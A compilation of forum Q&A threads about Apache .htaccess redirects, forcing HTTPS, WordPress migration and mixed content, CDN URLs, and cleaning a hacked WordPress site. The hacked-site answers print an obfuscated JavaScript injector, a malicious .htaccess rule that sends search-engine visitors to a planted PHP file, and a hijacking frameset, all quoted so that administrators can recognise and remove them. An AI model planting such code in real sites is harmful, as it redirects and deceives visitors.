I have a website that user have to loggin to. I want to use HTTPS so make a secure encrypted connection to the server to check the user name and password.
Currently on my server i have a folder called httpdocs, this is where my website is store, i also have a folder called httpsdocs.
Now as i stated my website is stored in httpdocs so logically i would go to http://website.com
But i found that if i go to https://website.com i get a secure connect to the pages stored in httpdocs.
Anyway, my question is, whenever i go to another link i loose the secure connect (URL goes back to http://) So how do i keep it all secure? Would i have to use the full URL in the href because that seems a bit lame instead of just using href=page2.php .
I'm new this area of website developing, but i am experienced in developing if that helps you.
Thanks a bunch for the help.
Some basic tutorials or reading material would be awesome if anyone knows of anything good?
Thanks again.
To answer your question in the comments you should use mod_rewrite (assuming its enabled):
RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ https://www.yourdomain.com/$1 [R,L]
that will send any webpage to https.
Do not use http://foo.com/path in urls, use //foo.com/path instead (or, even better, if you stay on the same server, use /path - it surely works). Doing full urls is bringing redundancy and brittleness. Avoid it.
Check out HTTP Strict Transport Security (HSTS):
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security
Basically, you can force the browser (unless it's IE<12) to always use HTTPS by adding this header to the secure site's configuration:
Header set Strict-Transport-Security "max-age=31536000; includeSubDomains"
This can also be combined with a 301 (PERMANENT) redirect for the non-secure/HTTP site's configuration, also outlined on the above referenced site.
Additionally/Alternatively, you can set the base href on your "website.com" pages by adding something like this towards the top of the <head> tag:
<base href="https://website.com/">
This will set all relative urls on the page (including links, stylesheets, scripts, images, etc.) to use the HTTPS site's root as their base. Depending upon the structure and size of your site, however, you will want to verify for each page that its base href and/or the urls within the page include any necessary path information (i.e. subdirectories). Otherwise a link on http://website.com/some/directory/page.html that points to "otherpage.html" will direct to http://website.com/otherpage.html instead of http://website.com/some/directory/otherpage.html . In such cases you would want either a base href of "http://website.com/some/directory/" or the relative url in the link should point to either "/some/directory/page.html" or "some/directory/page.html" (no slash needed in this case).
Related
I have shifted my website from one place to another. I have high traffic in the first place, so I need to redirect it on specific pages mapping to the second place. There are almost one thousand articles, so I need one thousand redirections. How to do that through .htaccess?
I am using the described below .htaccess code for this purpose but it is not working:
Redirect https://websiteOLD.example/article1 https://websiteNEW.example/article1
Redirect https://websiteOLD.example/article2 https://websiteNEW.example/article2
Redirect https://websiteOLD.example/article3 https://websiteNEW.example/article3
Redirect https://websiteOLD.example/article4 https://websiteNEW.example/article4
Redirect https://websiteOLD.example/article5 https://websiteNEW.example/article5
Redirect https://websiteOLD.example/article6 https://websiteNEW.example/article6
Whats wrong with the above described code lines? I have almost one thousand of such lines mapping each Wordpress article from old domain to the new domain.
I copied the website from one place and pasted it to other place.
If you've simply migrated your site from one domain to another then you just need a single mod_rewrite rule at the top of the .htaccess file to 301 redirect all URLs from the old domain to the new.
For example, the following would need to go before the # BEGIN WordPress comment marker.
RewriteEngine On
# Redirect any request that is NOT for example.com to example.com
RewriteCond %{HTTP_HOST} !=example.com
RewriteRule ^ https://example.com%{REQUEST_URI} [R=301,L]
Where example.com is the "new" canonical hostname.
The ! prefix on the above CondPattern negates the expression, so it is successful when the requested hostname does not match.
You do not need to repeat the RewriteEngine directive if this already occurs later in the file - it should already be part of the WordPress code block.
Test first with a 302 (temporary) redirect to avoid potential caching issues and make sure you've cleared your browser cache before testing.
You need to use mod_rewrite (ie. RewriteRule) as opposed to a mod_alias Redirect (or RedirectMatch) directive because:
The Redirect (and RedirectMatch) directives do not match the requested hostname. They match the URL-path only. (Which is why your attempt is not doing anything.)
As a general rule, if you are already using mod_rewrite in other parts of the config file (ie. in the WordPress code block) then you should be using mod_rewrite throughout in order to avoid potential conflicts.
Whats wrong with the above described code lines? I have almost one thousand of such lines mapping each Wordpress article from old domain to the new domain.
As mentioned above, the Redirect directive matches against the URL-path only. So, these directives will never match. See the Apache docs.
The directive you are trying to use is also a 302 (temporary) redirect. This needs to be a 301 (permanent) redirect in order to preserve SEO. (But, as mentioned, it is a good idea to test with a 302 first.)
Aside: However, you should avoid using 1000+ individual directives/redirects in the main .htaccess file (when there is no discernible pattern from the old to new URLs). The issue is that these directives are processed (unnecessarily) on every single request. You need to prioritise your normal site visitors, not the "old" redirect. Ideally, you would perform such redirects in your application, once it has been determined that these URLs don't exist in the current site (a WordPress plugin is suitable for this). Although, there are techniques you can use in .htaccess to prevent all these directives being processed on every request (ie. only processed when the old domain is requested, otherwise they are all skipped).
Hate to complain but I've spent like 2-3 hours working on trying to secure my WordPress site via SSL. I can successfully browse to my site via HTTPS, but I always get mixed content. I've tried several plugins, but there are still resources that are pulling images via HTTP. If I tried to browse to the URLs of those images manually, my web browser actually switches the URL to HTTPS, so I'm not sure why the site loads the images under HTTP but browsing to the images manually forces it over HTTPS. Very Confusing.
I've tried adding this in the .htaccess file of my root directory, so that all requests to the subdirectory /wp-content/ are forced over HTTPS, but it still does not work:
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^(wp-content/.*)$ https://www.example.com/$1 [R=301,L]
When I add this into the .htaccess file, reload the site, inspect element, I still see numerous links in here with http.
I've also tried HTTPS Easy Redirection, which forces HTTPS on everything but then results in a redirect loop. Still no luck.
Any suggestions would be greatly appreciated. It seems to just be the images.
What you have setup so far works, but does not address the root issue. As a matter of fact the .htaccess redirect is overkill.
Your Wordpress configuration needs to be edited. Go to your settings>general, ensure that the Wordpress Address Url and Site Address Url are https. It's that simple. You also need to edit any hard coded content urls to https.
You could use some wacky plugin to mutate your links but I would not advise it. But it won't work all the time. That will depend on how your content is constructed.
If you want to play it safe, whenever your add a resource link to content simply omit the protocol like this: ://example.com/.... That scenario works well with content generated by Visual Composer and the likes.
If the SSL is successfully installed in your server then use this plgin: https://wordpress.org/plugins/really-simple-ssl/
This will works for you...
Note: Take backup of your website and database first then proceed with the above plugin.
Thanks
We have the page domain.., and when you search at google.nl to Critical Alignment and click at the homepage of the site you are redirected after a couple of seconds to http://www.venusfactor.com/welcome/. We think the site is hacked, but can not find a redirect or anything.
Can someone help?
Have you checked if the redirect is made where the domain is hosted? Don't know what kind of host you use, but maybe the domain is set to redirect to that page from the host's side.
A good guide on what to do when your site gets hacked is this: http://codex.wordpress.org/FAQ_My_site_was_hacked
For your issue, check .htaccess first. There might be some redirect lines on the farthest right side of the file, so use the horizontal scroll bar.
Also, I would suggest to check with your host, since there might be many more files affected.
The same thing happened to me also.
First i thought it was a DNS hack problem, since it was a redirection problem. The hosting company responded to me that the DNS had no problems. Tey checked other common problems to find the source of the redirection and I was told that I had a malitious script in the header.php file, in the active theme foloder.
I manually checked the file in cPanel and I found the script that caused the redirection. To read more about this check the article on IStartBlogging
A new virus is spreading that is abusing the xmlrpc.php of wordpress to inject itself into the server and replace the javascript files with its own contaminated copies.
If you see too many xmlrpc requests POST requests from a suspicious ip-address, such as the below, verify the integrity of your javascript files.
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
One key feature of this virus is, it primarily targets the jQuery.js, replacing it with its own version (that when users browsers to your site, automatically redirects them to clickbait articles).
It achieves this by first posting a new php files, such as recure.php which usually contain obfuscated php code, or uploading wordpress plugins to the upload folder.
Most probably the attackers are trying to redirect the page to a different web site if the referred pages are google, yahoo, msn, aol, bing.
They will give back a frameset( similar to iframe) when we request the pages from above-specified referrals.
<frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
<frame src="http://remote_site_address_here" noresize="" scrolling="auto">
<link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
</frameset>
So we will see our website name at the top of the address bar but the site content will be different. These are the common files that the hackers used to inject suspicious code.
index.php
index.html
header.php
footer.php
functions.php
theme files
.htaccess
Nowadays the recently infected cases are showing the malicious code injection is with .htaccess file. Here I am demonstrating the injected .htaccess file.
Open your .htaccess file in the web root directory. And you can see this configurations
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]
Here they are redirecting to the malicious php file emilie-amethyst.php if the referral pages are google|yahoo|msn|aol|bing. This is the reason of that redirect issue.
So You have to remove this redirection configuration from your .htaccess file and also remove the malicious script (in this case it is emilie-amethyst.php).
Try to click the link from google search. still, if you see the problem, then remove all cookies related to this particular site and retry. It should solve the issue
The domain names used are only examples, so if you could use those example names in your answer that would be great. I'm having a very hard time wording exactly what I'm trying to do and because of that can't find the answer via searching, so I'm posting it as this analogy:
I work for a company that makes WordPress sites. We'll call that company SuperMedia, and their main website is supermedia.com. SuperMedia wants to host their clients' sites on their own server via subfolders. So in this case, we've created a client's WordPress site in the directory http://supermedia.com/greatclient/
The issue is that our client has a domain name, friendlyclient.com, and we need to link this domain name to their site which we are hosting on our server, but we don't want the urls to show "supermedia" at all.
So in simplest terms, right now all of our page urls look like this:
http://supermedia.com/greatclient/about
http://supermedia.com/greatclient/our-services
http://supermedia.com/greatclient/gallery
(etc...)
But we want them all to say:
http://friendlyclient.com/about
http://friendlyclient.com/our-services
http://friendlyclient.com/gallery
(etc...)
but still display the information on http://supermedia.com/greatclient/about, http://supermedia.com/greatclient/our-services, http://supermedia.com/greatclient/gallery, etc. respectively.
Is there a simple, fairly fast way to do this for all the pages we've created, either using .htaccess or some kind of plugin? I don't have a lot of back-end programming/database knowledge, so if it involves advanced programming, could you lay-out some steps on how I can achieve this?
If you are using apache, you can use mod_rewrite to do the rewriting. Try adding this to your .htaccess file(In the friendlyclient.com root folder)
# Match the host
RewriteCond %{HTTP_HOST} ^([^\.]+)\.com$ [NC]
# proxy the entire request to the /host/ and path
RewriteRule ^(.*)$ http://www.supermedia.com/%1/$1 [L,P]
This will make it so requesting http://friendly.com/about will serve http://www.supermedia.com/friendlyclient/about and dont forget to rename ur folder, from greatclient to friedlyclient
I am using Rackspace Cloud CDN (Limelight CDN) for my website. The URLs of the CDN are in the format
http://cxxxxxx.cdn.cloudfiles.rackspacecloud.com/something.jpg
My domain is mydomain.com.
Can I use IIS URL rewriting to show http://cxxxxxx.cdn.cloudfiles.rackspacecloud.com/something.jpg as http://images.mydomain.com/something.jpg? Or is this impossible without the CDN setup accepting my CNAME?
If so, can you please help create the URL rewrite rule? (Sorry, don't know how to use regular expressions)
Thanks,
WT
You cannot do this with a url rewrite rule, as that happens on your server.
One of the primary advantages of a CDN is to provide many points of access much closer to the user than your server may be. Using a round trip to your server completely destroys this advantage.
You can write a redirect rule to go from somewhere on your site that then sends the browser to the CDN, but the user will see the url of the CDN, (i.e. it won't be hidden).
To do so, consider something like
RewriteEngine On
RewriteRule ^/images/(.*)$ http://...cdn.....com/$1 [L,R=301]
If you're writing in a .htaccess file instead of in the server config file, then drop the first / after the ^.
As you alluded to, if you could get cloudfiles to accept a CNAME that pointed to their hostname, then it would be possible so simply replace your hostname with yours. However, I assume that by asking this question, you've already explored that avenue.